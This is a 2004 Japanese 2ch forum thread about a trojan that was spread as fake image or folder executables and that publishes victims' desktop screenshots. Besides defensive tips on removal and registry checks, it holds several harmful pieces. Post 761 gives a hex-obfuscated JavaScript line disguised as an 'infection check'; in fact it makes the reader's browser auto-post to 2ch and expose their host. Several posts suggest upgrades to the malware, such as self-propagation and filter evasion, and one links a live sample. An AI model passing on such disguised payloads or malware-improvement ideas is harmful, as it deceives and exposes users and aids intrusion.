しかしキンタマ関係のVirus作る奴はいつも笑わしてくれる

667 :[名無し]さん(bin+cue).rar:04/09/23 01:35:02 ID:ntwmMQhY
俺フォルダアイコンデフォのままなんだがこんなの踏む奴いるのか?

668 :[名無し]さん(bin+cue).rar:04/09/23 01:35:42 ID:mmGHQUsE
もううpはやんだの?

669 :[名無し]さん(bin+cue).rar:04/09/23 01:36:08 ID:yEjCkAsP
.folderどころか.exeを踏む奴がイパーイ
>>667
一応変えといたら?

670 :[名無し]さん(bin+cue).rar:04/09/23 01:37:41 ID:avdWvEQz
ってなに、shareの方でもクリップボード晒しウィルスが出てたんだな
share初のウィルスとは聞いていたが、クリボ晒しとは、なかなかやるじゃないかshare

671 :[名無し]さん(bin+cue).rar:04/09/23 01:39:33 ID:62NRg8JO
>>667 ロリ画像の欲望に負けたら踏むさ

>>668 祭り会場にいってみなされ

俺も今更ながら変えたよ 圧縮ファイルにはdelexeとSSMは手放せない 

672 :[名無し]さん(bin+cue).rar:04/09/23 01:41:38 ID:cDvdfQLH
ってかXPユーザは気付けよ、アイコンが古い事と小さくしたらそのまんま小さくなる点に。

673 :[名無し]さん(bin+cue).rar:04/09/23 01:43:20 ID:ntwmMQhY
>>672
同意。
アイコンが全然違う。

674 :[名無し]さん(bin+cue).rar:04/09/23 02:32:28 ID:E03v0hA1
オワタ

675 :[名無し]さん(bin+cue).rar:04/09/23 02:34:21 ID:mva2OVxj
Share(仮称)__part66
http://tmp4.2ch.net/test/read.cgi/download/1095530285/644
644 名前:人柱 ◆k2VpQ2TTb. :04/09/23 02:03:52 ID:9E7gEobQ
実は秘密のプログラムには秘密のバックドアが仕掛けてあったって知ってた?
京都府警のところにいってるよん。

676 :[名無し]さん(bin+cue).rar:04/09/23 02:40:20 ID:oBodvraO
まず作者は
・うp炉だを多数の中からランダムに
・キャプチャ以外もうp。できればkakikomi.txt
・繁殖機能
これよろしく

677 :[名無し]さん(bin+cue).rar:04/09/23 02:41:48 ID:yDWoB56M
Rock54対策も重要だな

678 :[名無し]さん(bin+cue).rar:04/09/23 02:47:20 ID:biKrCHPF
2chのそれっぽいスレでURL検索
対応うpろだCGI検出
特殊なファイル名でうp
うpファイル名を調べて同種ウィルスによるうp数が一定以上ならば
新たなうpろだ探し

複数のうpろだCGIに対応しておけばそれなりに
強固だと思ふ

679 :[名無し]さん(bin+cue).rar:04/09/23 02:47:44 ID:mmGHQUsE
あ〜面白かった。三日分は笑ったな。


680 :[名無し]さん(bin+cue).rar:04/09/23 02:51:47 ID:XmzjVHkd
exe ファイル 捨てたい

681 :[名無し]さん(bin+cue).rar:04/09/23 02:52:48 ID:oBodvraO
自身をうpろだに名前変えまくってうpしまくり




はやめてね
困るから

682 :[名無し]さん(bin+cue).rar:04/09/23 02:59:52 ID:EETLBaqB
苺キンタマに感染したかどうかは
どうやってわかるの?教えてエロい人

683 :[名無し]さん(bin+cue).rar:04/09/23 03:00:29 ID:LvJ+JBBu
苺ウィルスワラタw
なんだこりゃ

684 :[名無し]さん(bin+cue).rar:04/09/23 03:05:04 ID:LvJ+JBBu
それにしてもよくもいろいろと考えつくものだ

685 :[名無し]さん(bin+cue).rar:04/09/23 03:05:08 ID:IFT2b9V5
>>682
タスクマネージャひらいてプロセス見て、
なかにshellsystem.exeってのがあったらアウト。

686 :[名無し]さん(bin+cue).rar:04/09/23 03:12:36 ID:LvJ+JBBu
>>682
つーか、exe実行したの?実行してないなら9割9分平気。

687 :[名無し]さん(bin+cue).rar:04/09/23 03:19:35 ID:EETLBaqB
>>685
アリガトウ。感染してないみたいだ。良かった

>>686
してないと思う。

688 :[名無し]さん(bin+cue).rar:04/09/23 03:29:09 ID:xduUn+v/
作りこんではあるが、洗練されてない
不必要なコードがいっぱいあるけど、なんでやろ。

ttp://www.ff.iij4u.or.jp/~ch2/bbstable.html
ここからターゲット(おすすめ、チャット、特別企画、ツール類、運営案内など)を選択、

FROM=%s&mail=%s&MESSAGE=%s&bbs=%s&key=%s&time=%s&submit=%sで、メル欄に回数
subject=%s&FROM=%s&mail=%s&MESSAGE=%s&bbs=%s&time=%s&submit=%s、スレ作成機能
form-data /upload/c=03okari/confirm.cgi
up.isp.2ch.net http://up.isp.2ch.net/upload/c=03okari/confirm.cgi この辺で取得して書きコ
Software\Meropa ??なんだろこのディレクトリ
Software\Microsoft\Windows\CurrentVersion\Run 投下先
Software\Microsoft\Microsotf 何か投下
フォルダアイコンはbitmapをそのまま使ってるから変なんだな

逆アセも簡単そうなので、環境持ってると............
パラメータを変えるだけで、感染能力含め、かなりいろいろなことができるように作ってある
いわば、キンタマメイカーのようなものか?

689 :[名無し]さん(bin+cue).rar:04/09/23 03:30:41 ID:yEjCkAsP
カキコの内容少し弄るだけで又2chに投稿されるようになるしな

690 :[名無し]さん(bin+cue).rar:04/09/23 03:33:43 ID:62NRg8JO
将来のために余裕を持って設計してあるってことか…


691 :[名無し]さん(bin+cue).rar:04/09/23 03:35:48 ID:MBxbzncs
まだまだ祭りは続きそうだ

692 :[名無し]さん(bin+cue).rar:04/09/23 03:39:42 ID:9fWyBJ/z
今日はネットをしていなかった
今更ながらウィルスの存在を知った。
さっそく調べて行って見た。
関さんが面白いと思った。

693 :[名無し]さん(bin+cue).rar:04/09/23 03:39:47 ID:qx0T+sDR
キンタマ騒ぎがあってよかーたと重田

694 :[名無し]さん(bin+cue).rar:04/09/23 04:09:24 ID:LvJ+JBBu
>>690
いくらでも亜種が作れるってことだろうな

695 :[名無し]さん(bin+cue).rar:04/09/23 04:12:23 ID:rtwkFYAH
>>685
タスクマネージャのプロセスから削除だけじゃダメなの?

696 :[名無し]さん(bin+cue).rar:04/09/23 04:19:45 ID:kOQgldzO
当たり前だろ…

697 :[名無し]さん(bin+cue).rar:04/09/23 04:21:34 ID:rtwkFYAH
やっぱりだめか

698 :[名無し]さん(bin+cue).rar:04/09/23 04:23:04 ID:qaAkrrtW
再起動したら復活するし

699 :[名無し]さん(bin+cue).rar:04/09/23 04:25:47 ID:Y5vbHsBs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
ここら辺もregeditで見とけよ

700 :[名無し]さん(bin+cue).rar:04/09/23 04:27:59 ID:rtwkFYAH
shellsystem.exe以外は無視してOK?
あとノートンで遮断した場合は画像は流れない?

701 :[名無し]さん(bin+cue).rar:04/09/23 04:34:09 ID:XZhKNgqY
なんだか調子に乗って改造した奴が先に逮捕されそう

702 :[名無し]さん(bin+cue).rar:04/09/23 04:37:36 ID:rMURrwFg
牛に我慢させるか

703 :[名無し]さん(bin+cue).rar:04/09/23 04:40:22 ID:EiFN9IZi
誤爆だ わりぃ

704 :[名無し]さん(bin+cue).rar:04/09/23 04:44:18 ID:62NRg8JO
これならとってもわかりやすい画像ですな

http://v.isp.2ch.net/up/6e671bb4b867.jpg もう典型的かと

705 :[名無し]さん(bin+cue).rar:04/09/23 04:58:57 ID:MZi2DiBQ
これxp以外は平気なの?

706 :[名無し]さん(bin+cue).rar:04/09/23 04:59:21 ID:SFKAhjW3
ノートンインターネットセキュリティの様なものが常駐してたら
プログラムによって勝手に晒されるようなことは無いよな?


707 :[名無し]さん(bin+cue).rar:04/09/23 05:00:55 ID:JtMoVLJN
http://plaza.rakuten.co.jp/sakinya/

708 :[名無し]さん(bin+cue).rar:04/09/23 05:02:56 ID:g70Ywgh6
>>705
どうしてそういう結論になるのかが判らん。

>>706
設定次第。学習モードとかでユーザが勝手な通信を許可したら、
なんぼセキュリティソフトが入っててもそりゃアウトにもなる。

709 :[名無し]さん(bin+cue).rar:04/09/23 05:04:36 ID:Q7dG25BA
アップローダから知らないファイル落としたりしなきゃ、感染しないんだよな?
こうもいっぱいかかってると、最近何も落としてないのに不安になる

710 :[名無し]さん(bin+cue).rar:04/09/23 05:04:47 ID:MZi2DiBQ
>>708
ボロPCで感染実験してみたのさ(OS ME)
そんで晒されるか待ってるだけど、一向にうpされないんでつよ。

711 :[名無し]さん(bin+cue).rar:04/09/23 05:05:29 ID:4TL6YJ26
まぁ拡張子表示はしっかりしとけってこったな

712 :[名無し]さん(bin+cue).rar:04/09/23 05:09:58 ID:xduUn+v/
>>705
苺キンタマ(仮)は、Windows 98以降なら感染というか、踏んだら効果を示す

>>706
httpを使うからWebが見られる環境ならアウト(f/wで80番閉じてれば別だが、web見られないよ)


713 :[名無し]さん(bin+cue).rar:04/09/23 05:10:25 ID:5x3EooTF
http://v.isp.2ch.net/up/4250ab8226aa.jpg
貴様ッ見ているな!

714 :[名無し]さん(bin+cue).rar:04/09/23 05:13:40 ID:MZi2DiBQ
windows\shellsystem.exeはあったんだけど
レジストリは追加されてないんだよね
これじゃまだ感染しとらんのかね?

もう一回踏んでみるかな。。。

715 :[名無し]さん(bin+cue).rar:04/09/23 05:14:27 ID:57yhE0eV
PFW入れてれば、ウィルスが通信しようとしたのを検知してくれるんじゃないかい
何でもOKで通してれば意味無いけど
あと、SP2のPFWはアウトバウンド検知してくれないんだっけ?

716 :[名無し]さん(bin+cue).rar:04/09/23 05:18:37 ID:aY8YkHOS
ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip
トロイらしいんだけど、だれか解析頼む。

717 :[名無し]さん(bin+cue).rar:04/09/23 05:19:45 ID:xduUn+v/
>>715
ウイルスというか、現時点ではトロイなんだが
通信といっても、書き込みと変わらんからf/wでの検知は難しい
XP SP2のf/wは、外→内のみ。


718 :[名無し]さん(bin+cue).rar:04/09/23 05:25:36 ID:JsiucGEH
結局はキンタマと同じでexeを実行しなければいいってことだけど
XPは標準で表示しないしな。
何でこんな仕様なんだorz


ところでアップローダスレを自分のユーザ名で検索してしまった香具師


ノシ

719 :[名無し]さん(bin+cue).rar:04/09/23 05:25:48 ID:eq0QK75x
俺もサンプルとして捕獲しておきたいんだが、苺1の1360の三点セットってやつでいいんだよね。

720 :[名無し]さん(bin+cue).rar:04/09/23 05:27:02 ID:Ypzo5dny
ってかny関係ないじゃん・・・

721 :[名無し]さん(bin+cue).rar:04/09/23 05:28:00 ID:0ylh05j4
スレタイでややこしくなってるね

722 :[名無し]さん(bin+cue).rar:04/09/23 05:28:17 ID:57yhE0eV
>>717
普通のPFWってEXEファイル単位で通信を検知して知らせてくれんじゃないの?
ループバックでも利用してない限りは大丈夫だと思うが

723 :719:04/09/23 05:29:12 ID:eq0QK75x
OK、これであってたようだ。

724 :[名無し]さん(bin+cue).rar:04/09/23 05:29:54 ID:MqBRPt/h
>httpを使うからWebが見られる環境ならアウト(f/wで80番閉じてれば別だが、web見られないよ)

>f/w

725 :[名無し]さん(bin+cue).rar:04/09/23 05:33:52 ID:Pi3bt/OK
おもしろそいので俺も捕獲しとこ

726 :[名無し]さん(bin+cue).rar:04/09/23 05:34:21 ID:AH6SroMo
さて、キンタマと違って
特定のサイトやアップローダーに書き込みを行う以上
そこから業務妨害で損害賠償請求されてもおかしくないトロイなんだが

ま、日本の警察じゃ作成者を特定できんだろうな・・・
でも、苺にexeファイルをアップした人間を特定して締め上げればいいのか?

727 :[名無し]さん(bin+cue).rar:04/09/23 05:34:22 ID:Pi3bt/OK
間違え;y=ー( ゚д゚)・∵. ターン

728 :[名無し]さん(bin+cue).rar:04/09/23 05:50:14 ID:U98tvZkV
要望まとめ
・複数のうpろだをランダムに使うように(2ちゃんねるアップローダーはやめれ)
・デスクトップ画像以外もうpするように(kakikomi.txtとか)
・繁殖機能。zipで適当なファイルといっしょにウィルス本体も固めてうp。
・Rock54対策。NGワードが含まれる書き込みが規制されるから晒しテンプレを複数作れば大丈夫か?

729 :[名無し]さん(bin+cue).rar:04/09/23 05:50:39 ID:VGKgqq6T
なんで怪しいexeファイルを実行すんのかなって思ってたけど
拡張子を表示しない設定だと初心者はわからんわな〜

730 :[名無し]さん(bin+cue).rar:04/09/23 05:52:17 ID:IFT2b9V5
>>728
要望するなよ(笑)

731 :[名無し]さん(bin+cue).rar:04/09/23 05:52:23 ID:4TL6YJ26
セキュリティに対する意識ってなかなかあがらないな

732 :[名無し]さん(bin+cue).rar:04/09/23 05:54:24 ID:fgnK5pHv
>>728
共犯者キタ━━━━━━(゚∀゚)━━━━━━ !!!!!

733 :[名無し]さん(bin+cue).rar:04/09/23 05:56:44 ID:tcoLxpqV
人間のロリ好きってアニメ、ゲームも好む傾向があるんだな。
なかなか興味深かった。

734 :[名無し]さん(bin+cue).rar:04/09/23 05:58:31 ID:cTDJ+/Lv
kakikomi晒されたら辛いな
他の情報で個人割れてたらきっと死人が出る

735 :[名無し]さん(bin+cue).rar:04/09/23 06:07:00 ID:JsiucGEH
exeごとに通信制御するNortonとかのFWは
ポート80番使ってようとブロックするんじゃないの?

736 :[名無し]さん(bin+cue).rar:04/09/23 06:09:13 ID:IFT2b9V5
>>735
する。というか、初物がソケットひらこうとしたときに騒ぐ。

737 :[名無し]さん(bin+cue).rar:04/09/23 06:10:23 ID:0ylh05j4
で、エロの魔力で許可するをクリック!

738 :[名無し]さん(bin+cue).rar:04/09/23 06:18:26 ID:0jfdhz8j

簡易プロテクト?


C:\WINDOWS>copy notepad.exe shellsystem.exe
C:\WINDOWS>attrib +R shellsystem.exe


とりあえず実験用の98SE環境ではうまくいった。
メインマシンで実験する度胸はないので、XPなどでは不明。



739 :[名無し]さん(bin+cue).rar:04/09/23 06:25:02 ID:J6w/KxT0
これ犯人たどれるだろ。ネットカフェとかかな?

740 :[名無し]さん(bin+cue).rar:04/09/23 06:26:03 ID:IFT2b9V5
>>739
踏み台はさまってたら無理

741 :[名無し]さん(bin+cue).rar:04/09/23 06:29:08 ID:J6w/KxT0
>>740
プロバイダに問い合わせりゃアクセス記録のこってんじゃないの?

742 :[名無し]さん(bin+cue).rar:04/09/23 06:32:12 ID:IFT2b9V5
>>741
ドコのプロバイダに問い合わせるの?

743 :[名無し]さん(bin+cue).rar:04/09/23 06:32:29 ID:JsiucGEH
海外プロキシを多段でかましてればよほどのことがないと
たどれてもたどらないと思う。



744 :[名無し]さん(bin+cue).rar:04/09/23 06:35:42 ID:J6w/KxT0
>>742
踏み台のだよ。

745 :[名無し]さん(bin+cue).rar:04/09/23 06:38:02 ID:IFT2b9V5
>>744
もし俺が犯人だったとしたら、踏み台にしろ串にしろ
一段ではやらないだろうね。捕まりたくないし。

746 :[名無し]さん(bin+cue).rar:04/09/23 06:40:16 ID:xduUn+v/
>>739
追求のキーになるのが >>688で報告した
> Software\Meropa ??なんだろこのディレクトリ
なんだが、こんなディレクトリを作るアプリは、かなーり特殊な
半導体設計用のものらしい。こんなの入れてる人間は国内では限られる。
ここから手繰るのがよさげ。スキルは相当と思えるので、配布元から掘るのは難しそう


747 :[名無し]さん(bin+cue).rar:04/09/23 06:40:33 ID:J6w/KxT0
>>745
俺がもし被害者だったら100段くらいまでは頑張ってたどるよw
この手のウイルスは犯人が殺されても不思議じゃないと思うんだが。

748 :[名無し]さん(bin+cue).rar:04/09/23 06:44:13 ID:xduUn+v/
>>747
そこいらに、いくらでもある
WEP無効の無線LANを踏み台にしてたら、
多段串・海外串なんか使わなくても
たどるのは難しい。

749 :[名無し]さん(bin+cue).rar:04/09/23 06:44:40 ID:J6w/KxT0
殺されるは言い過ぎかw でもなんらかの報復は受けると思う。
つーか踏み台に時限セットされたものなら辿るの不可能っぽいな・・

750 :[名無し]さん(bin+cue).rar:04/09/23 06:45:30 ID:zW53Q5jb
ネカフェで時限式アップロードするように仕込んだとか。

751 :[名無し]さん(bin+cue).rar:04/09/23 06:46:34 ID:99Ier2R9
頑張れ。

752 :[名無し]さん(bin+cue).rar:04/09/23 07:02:00 ID:CBy0Cio6
こうゆうのを見ると2chやnyする人ってヒッ●ーだけなのかなって思うね

http://v.isp.2ch.net/up/fa86350a6026.jpg

ウイルスに気づかずに必死に抜いている人1名w

753 :469:04/09/23 07:04:35 ID:kh8TR4yq
これって本人達が寝てる間は安全なんだね。

754 :[名無し]さん(bin+cue).rar:04/09/23 07:08:11 ID:kh8TR4yq
数字消すの忘れた・・・_| ̄|○

755 :[名無し]さん(bin+cue).rar:04/09/23 07:08:12 ID:CBy0Cio6
どうせなら、SS、PC名だけじゃなくて、
IP・ホストも晒してほしかったな

756 :[名無し]さん(bin+cue).rar:04/09/23 07:12:12 ID:IFT2b9V5
>>752
これは狙ってやってる気がしないではないな(笑)

757 :[名無し]さん(bin+cue).rar:04/09/23 07:45:55 ID:CtAJ3p7u
俺はこんなウイルスは怖くて作れないな
何が怖いって狙われるのが怖いね
作った奴は絶対に捕まらないと思ってるんだから
本気になって追ってみたら面白いことになるかも
例えばウイルス作者が警察だったりしたらヤバイだろうし。
そうじゃなくても作った奴は確実に追われた後人生終わるだろうし
そんな一世一代の大事俺は出来ない

758 :[名無し]さん(bin+cue).rar:04/09/23 08:14:59 ID:wZ9Gu9IX
新種ウイルスと聞いてきました

759 :[名無し]さん(bin+cue).rar:04/09/23 08:15:35 ID:iqYKdWhe
面白い事考える奴もいるもんだな

760 :[名無し]さん(bin+cue).rar:04/09/23 08:18:41 ID:U98tvZkV
Winnyは関係ないけどな。
今やってるのはShareで回ってるふしあなで2ch書き込みと半虹の苺キンタマ

761 :[名無し]さん(bin+cue).rar:04/09/23 08:25:55 ID:U98tvZkV
便乗してこれまで流行ってる
JavaScript:document.body.innerHTMLのガイドライン2
http://that3.2ch.net/test/read.cgi/gline/1076853643/595-586


感染確認するには
2ch専用ブラウザを使用している人は、IEなどの一般的なブラウザでこのスレを開いておく。
1、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。

2、 改行を外して1行にする。
3、 1行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。
4、 Enterを押す(もしくは「移動」をクリックする)。
エラーが出れば感染してます

762 :[名無し]さん(bin+cue).rar:04/09/23 08:26:46 ID:U98tvZkV
>>761
参照間違えた・・
http://that3.2ch.net/test/read.cgi/gline/1076853643/595-596

763 :[名無し]さん(bin+cue).rar:04/09/23 08:27:19 ID:1gUyhrM3
 

764 :[名無し]さん(bin+cue).rar:04/09/23 08:51:04 ID:SPCjNc3y
俺はペケピーがはじめての初心者だが、拡張子表示は真っ先にやったぞ…。
まぁ、かつては黒羊とメールストームをふんだ苦い経験持ちだが。

765 :[名無し]さん(bin+cue).rar:04/09/23 09:07:42 ID:SY1J+4JW
>>761
ワロタ
ロリ画像ですか

766 :[名無し]さん(bin+cue).rar:04/09/23 09:08:11 ID:GmtpX3PS
【使用OS】WinXP
【WindowsUpdateしてるか】はい。
【AntiVirusは】 ??
【ちゃんとUpdateしてるか】??
【スキャンした結果】オンラインにてスキャン
【オンラインスキャンしたならその結果は】いつもなら数個出るのに、不自然なぐらい何も検出されませんでした。
【Winnyのバージョン】使ってません。ネットでウィルス貰いました。
【Winny歴、総DL量は】 無し
【テンプレを読んだか】 はい。
【テンプレにある対策を実行したか】 実行しました。特に何も無かったです。
【症状か具体的に、分かる限りすべて書く】 何となく、重い。動作が鈍い。
【何をしたらそんなことになったのか】 うpされてたファイルを開いたら。
【これまでにとった措置】オンラインスキャンのみ。

767 :[名無し]さん(bin+cue).rar:04/09/23 09:12:14 ID:U98tvZkV
>>766
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー 〜 (写真集) (ロリータ) 河瀬菜美.exe
どれか開いた?

768 :[名無し]さん(bin+cue).rar:04/09/23 09:19:52 ID:Jz5Ghtix
キンタマ作った香具師、逮捕されたのか

769 :[名無し]さん(bin+cue).rar:04/09/23 09:25:30 ID:GmtpX3PS
>>767
開いたというか、ダブルクリックして開こうとした。
どれだったか覚えてない…。多分、2回ぐらい開こうとした。
何か怪しかったし、急にPCの反応がおかしくなったから、速攻電源切りました。
その後にまた起動して、全部ゴミ箱に捨てて、ゴミ箱も空にしました。

770 :[名無し]さん(bin+cue).rar:04/09/23 09:28:46 ID:kh8TR4yq
>>769
もう遅いw
とりあえず↓に来い。
削除の方法が分かるかもしれない。

アップローダーってずるい
http://idol.bbspink.com/test/read.cgi/ascii2d/1095880065/

771 :[名無し]さん(bin+cue).rar:04/09/23 09:28:49 ID:j/Jnnczc
>>769
今すぐネットを切断
C:\WINDOWSフォルダの中でshellsystem.exeを消せ
再起動して後は知ってるならレジストリの自動実行の辺りを探せ
急げ

772 :[名無し]さん(bin+cue).rar:04/09/23 09:29:12 ID:U98tvZkV
>>769
とりあえずユーザ名とコンピュータ名を晒せ。
マイコンピュータのプロパティから見れる。

773 :[名無し]さん(bin+cue).rar:04/09/23 09:30:19 ID:afWjuRcq
>>766
ご愁傷様

774 :[名無し]さん(bin+cue).rar:04/09/23 09:30:56 ID:0ylh05j4
>>685
を見て確認してみ

775 :[名無し]さん(bin+cue).rar:04/09/23 09:41:27 ID:P9SKfCRL
>>762
596 名前:水先案名無い人[sage] 投稿日:04/09/21(火) 22:21:33 ID:aLtl7+rE<
>>595のやつやると名前欄fusianasan、本文ロリ画像くださいで勝手に投稿されるってわけか?

597 名前:水先案名無い人[] 投稿日:04/09/21(火) 23:16:48 ID:raTTdWET<
16進でご苦労な事だ。

598 名前:p29d3b8.urawac00.ap.so-net.ne.jp[] 投稿日:04/09/21(火) 23:18:09 ID:ItaWKNCP<
ロリ画像ください

599 名前:水先案名無い人[sage] 投稿日:04/09/21(火) 23:18:27 ID:ItaWKNCP<
orz

600 名前:水先案名無い人[sage] 投稿日:04/09/22(水) 00:18:50 ID:8s+8uxdE<
おらは投稿確認が出て助かっただ

601 名前:水先案名無い人[sage] 投稿日:04/09/22(水) 01:00:01 ID:A3RcQubp<
そいえば、たいていの掲示板ってhttpだからポストする時に
暗号化されていないデータが云々のダイアログを出せるはずだが、
それを解除してる人って結構多いみたいだね。

602 名前:zaq3d2e96f7.zaq.ne.jp[] 投稿日:04/09/22(水) 02:42:09 ID:nVW0EyTb<
ロリ画像ください

603 名前:濡れ衣 zaq3d2e96f7.zaq.ne.jp ◆SbICHIROZ6 [sage] 投稿日:04/09/22(水) 02:43:59 ID:nVW0EyTb<
570はどうなるかちゃんと書いておいてくれよ。。
リモホ晒すのは構わないけど、テストスレになっちまうぞ

604 名前:水先案名無い人[sage] 投稿日:04/09/22(水) 03:55:11 ID:7PnzxniJ<
いかん、笑いが止まらんw
やらんでよかったw

776 :[名無し]さん(bin+cue).rar:04/09/23 09:47:30 ID:tcoLxpqV
ノートンでスキャン中の画像がよく晒されてたけど
対策ソフト入れてると安心するから簡単に引っかかるんじゃないの。
しかもこういう祭り時には無力。全くの無駄金だな。

777 :[名無し]さん(bin+cue).rar:04/09/23 09:53:59 ID:qlyssBj7
拡張子表示は鬱陶しいし、長いスペースとかがあるから詳細表示のファイルの種類で判断してるなぁ

778 :[名無し]さん(bin+cue).rar:04/09/23 09:55:34 ID:GmtpX3PS
>>771
そのレジストリとやらは良く分からんが…
まあ、とりあえず初心者板で聞いてくる。
検索したらshellsystem.exeが見付かった。
とりあえず、急ぎます。ありがとう。

779 :[名無し]さん(bin+cue).rar:04/09/23 09:57:12 ID:cDvdfQLH
>拡張子表示は鬱陶しい

ハァ?


780 :[名無し]さん(bin+cue).rar:04/09/23 10:00:05 ID:/EYVc77v
明かされてる画像みても無害?

781 :[名無し]さん(bin+cue).rar:04/09/23 10:01:16 ID:xduUn+v/
いくらノートン先生でも、登場したてのトロイにすぐには反応できませんぜ
今回の作成日時は、3本とも22日15:57 流されたのが夕方としても、まだ
10時間しかたってない。しかも踏んでるやつ大杉。

作者も、これほどの効果を期待してなかっただろーな。そうでなきゃアプロダ
が落ちるというのも考慮してると思う。この反応からして、ここ数日間に数種の
亜種が出てくると思う。トロイの改変も楽勝っぽいので、便乗犯も多そう。

一番のセキュリティホールは、ユーザーの意識だもんよ。

782 :[名無し]さん(bin+cue).rar:04/09/23 10:03:05 ID:Ze0M08FR
ちなみにキンタマが発見されたのが3月半ば。対応は3月末。

783 :[名無し]さん(bin+cue).rar:04/09/23 10:03:32 ID:kDRZUavo
歴史は繰り返す。

784 :[名無し]さん(bin+cue).rar:04/09/23 10:05:29 ID:4TL6YJ26
そして人は学ばない

785 :[名無し]さん(bin+cue).rar:04/09/23 10:07:05 ID:7loVoFeI
mp3の名前などを勝手にいじるウィルスってあります?

786 :[名無し]さん(bin+cue).rar:04/09/23 10:08:25 ID:LvJ+JBBu
>>729
アイコンでわかるだろ?

787 :[名無し]さん(bin+cue).rar:04/09/23 10:12:17 ID:kDRZUavo
>>786
アイコンがフォルダアイコンに偽装されてるから無知が実行する。

788 :[名無し]さん(bin+cue).rar:04/09/23 10:16:24 ID:qJ0+JsGI
で、誰かウイルス駆除ソフト屋さんに報告したの?

789 :[名無し]さん(bin+cue).rar:04/09/23 10:23:29 ID:iqYKdWhe
>>780
画像自体は無害。
って、こんな程度の知識の人が踏むんだろうなぁ。

790 :[名無し]さん(bin+cue).rar:04/09/23 10:29:04 ID:ky5A4Ls4
>>789
ttp://www.microsoft.com/japan/security/security_bulletins/ms04-028e.asp

こんなのがあるから一概には大丈夫とは言えないかもしれない

791 :[名無し]さん(bin+cue).rar:04/09/23 10:30:06 ID:0lvmtZMl
>>789
っていう、おまえも相当やばいのだが

792 :[名無し]さん(bin+cue).rar:04/09/23 10:32:33 ID:cDvdfQLH
>>789
                          ,、ァ
                        ,、 '";ィ'
________                /::::::/l:l
─- 、::::;;;;;;;;;`゙゙''‐ 、    __,,,,......,,,,_/:::::::::/: !|
  . : : : : : : `゙'ヽ、:::゙ヾ´::::::::::::::::::::::`゙゙゙'''‐'、. l|   またまた ご冗談を
、、 . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ!                 ,、- 、
.ヽ:゙ヽ; : : : : : :ノ:::::::::::::::::::::;;、-、、゙:::     rー-:'、                /   }¬、
. \::゙、: : : :./::::::::::::::;、-''"::::::::::   ,...,:::,::., :::':、           _,,/,,  ,、.,/   }
   ヽ:ヽ、 /:::::::::::::::::::::::::     _  `゙''‐''"  __,,',,,,___       /~   ヾ::::ツ,、-/
     `ヽ、:::::::::;;;、、--‐‐'''''',,iニ-    _|  、-l、,},,   ̄""'''¬-, '  ''‐-、 .,ノ'゙,i';;;;ツ
   _,,,、-‐l'''"´:::::::'  ,、-'" ,.X,_,,、-v'"''゙''yr-ヽ / ゙゙'ヽ、,    ,.'      j゙,,, ´ 7
,、-''"    .l:::::::::::;、-''"  ,.-'  ゙、""ヾ'r-;;:l  冫、     ヽ、 /    __,,.ノ:::::ヽ. /
       l;、-'゙:   ,/       ゞ=‐'"~゙゙') ./. \    /  '''"/::::;:::;r-''‐ヽ
     ,、‐゙ ヽ:::::..,.r'゙         ,,. ,r/ ./    ヽ.   ,'     '、ノ''"   ノ
   ,、‐'゙     ン;"::::::.       "´ '゙ ´ /      ゙、 ,'            /
  '     //:::::::::            {.        V           /
        / ./:::::::::::::            ',       /         /
.    /  /:::::::::::::::::.            ',.     /   ,.、     /

793 :[名無し]さん(bin+cue).rar:04/09/23 10:35:22 ID:iqYKdWhe
>>790-792
いやあ、もちろんgdiplus.dllは知ってますって。わざわざ書かなくていいかと思ったんだけど。
こんなにレスが付くとは…。

794 :[名無し]さん(bin+cue).rar:04/09/23 10:36:31 ID:cDvdfQLH
>>793
                          ,、ァ
                        ,、 '";ィ'
________                /::::::/l:l
─- 、::::;;;;;;;;;`゙゙''‐ 、    __,,,,......,,,,_/:::::::::/: !|
  . : : : : : : `゙'ヽ、:::゙ヾ´::::::::::::::::::::::`゙゙゙'''‐'、. l|   またまた ご冗談を
、、 . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ!                 ,、- 、
.ヽ:゙ヽ; : : : : : :ノ:::::::::::::::::::::;;、-、、゙:::     rー-:'、                /   }¬、
. \::゙、: : : :./::::::::::::::;、-''"::::::::::   ,...,:::,::., :::':、           _,,/,,  ,、.,/   }
   ヽ:ヽ、 /:::::::::::::::::::::::::     _  `゙''‐''"  __,,',,,,___       /~   ヾ::::ツ,、-/
     `ヽ、:::::::::;;;、、--‐‐'''''',,iニ-    _|  、-l、,},,   ̄""'''¬-, '  ''‐-、 .,ノ'゙,i';;;;ツ
   _,,,、-‐l'''"´:::::::'  ,、-'" ,.X,_,,、-v'"''゙''yr-ヽ / ゙゙'ヽ、,    ,.'      j゙,,, ´ 7
,、-''"    .l:::::::::::;、-''"  ,.-'  ゙、""ヾ'r-;;:l  冫、     ヽ、 /    __,,.ノ:::::ヽ. /
       l;、-'゙:   ,/       ゞ=‐'"~゙゙') ./. \    /  '''"/::::;:::;r-''‐ヽ
     ,、‐゙ ヽ:::::..,.r'゙         ,,. ,r/ ./    ヽ.   ,'     '、ノ''"   ノ
   ,、‐'゙     ン;"::::::.       "´ '゙ ´ /      ゙、 ,'            /
  '     //:::::::::            {.        V           /
        / ./:::::::::::::            ',       /         /
.    /  /:::::::::::::::::.            ',.     /   ,.、     /

795 :[名無し]さん(bin+cue).rar:04/09/23 10:37:15 ID:iqYKdWhe
んー、でもよく考えると俺が間違ってるな。MSのGDI+の事も書けばよかった。

796 :[名無し]さん(bin+cue).rar:04/09/23 10:37:27 ID:xduUn+v/
今回のに限っていえば、晒されてるjpegは今のとこ無害だからな。
便乗してアプロに仕込むやつもいそうだが

